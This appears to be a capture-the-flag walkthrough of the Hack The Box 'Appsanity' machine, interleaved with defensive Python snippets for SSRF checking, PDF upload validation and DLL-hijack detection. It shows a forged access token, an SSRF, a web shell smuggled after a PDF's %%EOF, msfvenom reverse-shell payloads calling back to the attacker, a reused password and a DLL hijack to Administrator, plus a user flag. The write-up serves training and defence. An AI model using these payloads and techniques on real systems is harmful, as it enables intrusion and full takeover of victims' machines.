```
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sS -sV -oA nmap/initial_scan 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:22 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 06:23 (0:00:17 remaining)
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
443/tcp open  https?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.66 seconds
```
```
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sS -p- -Pn --min-rate 500 -oA nmap/full_tcp_scan 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:27 EDT
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 263.20 seconds
```
```
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sC -sV -oA nmap/script_scan -p 80,443,5985 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:42 EDT
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://meddigi.htb/
443/tcp  open  https?
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.55 seconds
```
Foothold
Add the vhost to /etc/hosts:
```
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ echo "10.129.46.232 meddigi.htb" | sudo tee -a /etc/hosts
10.129.46.232 meddigi.htb
```
Enumerating directories using gobuster, I found nothing.
So I went to portal.meddigi.htb/Profile, intercepted the request and the response, and added a Set-Cookie header to set the access_token in the response:
```
HTTP/2 302 Found
Location: /Profile
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEwIiwiZW1haWwiOiJkb2N0b3JAd2hvLmNvbSIsIm5iZiI6MTY5ODg0OTIzMywiZXhwIjoxNjk4ODUyODMzLCJpYXQiOjE2OTg4NDkyMzMsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.8s17W4ZWYU6H_elGsVj-xtI_RDmCnqEcJk4RVF_zPP8; expires=Wed, 01 Nov 2023 16:33:53 GMT; path=/; secure; samesite=strict; httponly
Date: Wed, 01 Nov 2023 14:33:53 GMT
```
This gets us into the doctor's portal profile.
Found nothing in the Scheduler.
The Issue Prescription page could be vulnerable to SSRF, so I intercepted the request and sent it to Repeater.
We find the address http://127.0.0.1:8080/, which allows us to see the reports.
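A server-side check for the Link parameter that would have refused the loopback address found above, added here as an example rather than code from the MedDigi application; it assumes a Python backend, and the resolver helper and the stub resolvers used for offline testing are hypothetical.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host):
    """Every address the name resolves to (A and AAAA); hypothetical helper."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_link(url, resolve=resolve_all):
    """Return True only if the (already form-decoded) Link value points at a
    public address on a standard web port.

    Every resolved address must be global: a single internal address among
    several is enough to refuse, which also blocks DNS names that merely
    alias 127.0.0.1 or another internal host.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False  # 127.0.0.1:8080 never even reaches the address check
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]  # literal IP, no DNS
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
        except (socket.gaierror, ValueError):
            return False
    for addr in addrs:
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
        if not addr.is_global:  # loopback, private, link-local, shared, ...
            return False
    return bool(addrs)
```

The fetch that follows should connect to the vetted address rather than re-resolving the name, and the internal report service on 8080 should require authentication regardless of who reaches it.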
```
┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=9998 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 684 bytes
Final size of aspx file: 4565 bytes
Saved as: shell.aspx
```
I went over to the Upload Report page, uploaded a blank PDF and intercepted the request. Let's change the extension of our PDF from .pdf to .aspx and add our shell after %%EOF.
Change the host to your IP and forward the request; now we can listen on the port using nc.
```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
```
We can head back to Repeater, and we should see our report.
If we go to the Raw tab of the response and scroll down, we'll find the View Report link of our uploaded shell, which is ViewReport.aspx?file=2be24979-ddae-4f57-a9e7-d94e44429b64_blank.aspx. I added it to the Link parameter as http%3a//127.0.0.1%3a8080/ViewReport.aspx?file=2be24979-ddae-4f57-a9e7-d94e44429b64_blank.aspx and sent the request.
It spawned a shell.
```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.71.74] 65463
Spawn Shell...
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
```
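A server-side upload validator, added here as an example (not the MedDigi application's own code), that would stop each step of the bypass just used: the .aspx rename, a non-PDF body, and a payload appended after %%EOF. The sample inputs are constructed, and the storage-name helper is hypothetical.

```python
import os
import uuid

ALLOWED_EXTENSIONS = {".pdf"}
PDF_MAGIC = b"%PDF-"
PDF_EOF = b"%%EOF"

# Constructed sample inputs: a minimal blank PDF, and the same file with inert
# data appended after %%EOF, standing in for the shell appended in the writeup.
BLANK_PDF = (b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\n"
             b"trailer<</Root 1 0 R>>\n%%EOF\n")
PDF_WITH_TRAILER_DATA = BLANK_PDF + b"<!-- appended data (constructed, inert) -->\n"


def validate_report_upload(filename, data, max_bytes=10 * 1024 * 1024):
    """Return (ok, reason). Decide on the bytes, not on the client's filename.

    Each check blocks one step of the bypass: the renamed extension, a body
    that is not a PDF at all, and content appended after the final %%EOF.
    """
    if os.path.splitext(filename)[1].lower() not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    if len(data) > max_bytes:
        return False, "file too large"
    if not data.startswith(PDF_MAGIC):
        return False, "missing %PDF- header"
    end = data.rfind(PDF_EOF)
    if end == -1:
        return False, "missing %%EOF trailer"
    # Incremental updates legitimately leave several %%EOF markers in a file,
    # but nothing except whitespace may follow the last one.
    if data[end + len(PDF_EOF):].strip(b" \t\r\n"):
        return False, "data after final %%EOF"
    return True, "ok"


def storage_name(_client_filename):
    """Server-chosen name and extension (hypothetical helper): the client's
    name never reaches disk, so a *_blank.aspx path cannot come to exist."""
    return f"{uuid.uuid4()}.pdf"
```

Validation is only half of it: the stored file must live outside the web root under the server-chosen name so IIS never maps it to a script handler, and ViewReport should return it as an attachment rather than executing it.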
Found the user flag on the Desktop of the user's folder.
```
c:\Users\svc_exampanel\Desktop>type user.txt
type user.txt
ee64bccf15802ae700de4ccf1a4d9944
```
Getting Root
Information Gathering
Going to open a session using Metasploit and msfvenom to have a persistent session.
```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > seet PAYLOAD windows/x64/meterpreter/reverse_https
[-] Unknown command: seet
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.71
msf6 exploit(multi/handler) > set LPORT 9998
LPORT => 9998
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit

[*] Started HTTPS reverse handler on https://10.10.14.71:9998
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.71:9998 -> 10.129.134.38:62064) at 2023-11-04 06:55:45 -0400
[*] Meterpreter session 2 opened (10.10.14.71:9998 -> 10.129.134.38:62063) at 2023-11-04 06:55:45 -0400

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x64/windows  APPSANITY\svc_exampanel @ APPSANITY  10.10.14.71:9998 -> 10.129.134.38:62064 (10.129.134.38)
  2         meterpreter x64/windows  APPSANITY\svc_exampanel @ APPSANITY  10.10.14.71:9998 -> 10.129.134.38:62063 (10.129.134.38)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter >
```
Found some DLLs in the inetpub folder and downloaded them for inspection.
Spawn a shell to query the registry and search for the key:
```
meterpreter > shell
Process 3292 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
```
Using Evil-WinRM, we were able to log in as devdoc using the password:
```
┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ evil-winrm -i meddigi.htb -u devdoc -p "1g0tTh3R3m3dy\!\!"

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\devdoc\Documents>
```
It tells us about C:\Program Files\ReportManagement\Libraries and externalupload.dll.
Going to C:\Program Files\ReportManagement\Libraries, we see that externalupload.dll doesn't exist. We can try to create a malicious DLL to escalate privileges.
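Detection logic for the condition just described, added here as an example and not part of the writeup: a DLL that a less privileged account created in the application's Libraries directory is then loaded by a privileged process. It runs over constructed, simplified Sysmon-style events (FileCreate and ImageLoad); the console executable name is a placeholder, and only the Libraries path and the DLL name come from the page.

```python
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"
LIB_DIR = r"C:\Program Files\ReportManagement\Libraries"

# Constructed, simplified Sysmon-style events (not logs from the box):
# id 11 = FileCreate, id 7 = ImageLoad. The loading executable is a placeholder.
SAMPLE_EVENTS = [
    {"id": 11, "time": "2023-11-04 14:47:10", "user": r"APPSANITY\devdoc",
     "target": LIB_DIR + r"\externalupload.dll"},
    {"id": 7, "time": "2023-11-04 14:48:50", "user": r"APPSANITY\Administrator",
     "image": r"C:\Program Files\ReportManagement\REPORT_CONSOLE_PLACEHOLDER.exe",
     "loaded": LIB_DIR + r"\externalupload.dll", "signed": False},
    {"id": 7, "time": "2023-11-04 14:48:50", "user": r"APPSANITY\Administrator",
     "image": r"C:\Program Files\ReportManagement\REPORT_CONSOLE_PLACEHOLDER.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll", "signed": True},
]


def find_dropped_dll_loads(events, window=timedelta(minutes=15)):
    """Flag image loads of a DLL created shortly before by a different account,
    or that is unsigned: the shape of a search-order hijack of a missing DLL."""
    created = {}
    for e in events:
        if e["id"] == 11 and e["target"].lower().endswith(".dll"):
            created[e["target"].lower()] = e
    hits = []
    for e in events:
        if e["id"] != 7:
            continue
        origin = created.get(e["loaded"].lower())
        if origin is None:
            continue  # not a freshly dropped file; out of scope for this rule
        age = datetime.strptime(e["time"], FMT) - datetime.strptime(origin["time"], FMT)
        if not timedelta(0) <= age <= window:
            continue
        reasons = []
        if origin["user"].lower() != e["user"].lower():
            reasons.append("created by %s, loaded as %s" % (origin["user"], e["user"]))
        if not e["signed"]:
            reasons.append("unsigned")
        if reasons:
            hits.append({"loaded": e["loaded"], "image": e["image"], "reasons": reasons})
    return hits
```

On a real host the same rule runs over Sysmon Event IDs 11 and 7; the underlying fix is to make the Libraries directory non-writable for standard users and have the console load only signed DLLs from full paths.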
Privilege Escalation
Create a payload using msfvenom and catch the reverse shell with a Metasploit handler.
```
┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=1234 -f dll -o externalupload.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 596 bytes
Final size of dll file: 9216 bytes
Saved as: externalupload.dll
```
```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
```
Now connect to the port using netcat, which opens the Report Management administrative console running on port 100, and trigger our payload with the upload command.
```
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ nc 127.0.0.1 100
Reports Management administrative console.
Type "help" to view available commands.
upload externalupload.dll
Attempting to upload to external source.
```
```
msf6 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://10.10.14.71:1234
[!] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.71:1234 -> 10.129.134.38:62087) at 2023-11-04 10:48:50 -0400
sessions

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x64/windows  APPSANITY\Administrator @ APPSANITY  10.10.14.71:1234 -> 10.129.134.38:62087 (10.129.134.38)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: APPSANITY\Administrator
meterpreter > cd C:/Users/Administrator
meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2023-09-24 13:28:16 -0400  desktop.ini
100444/r--r--r--  34    fil   2023-11-04 06:14:15 -0400  root.txt
```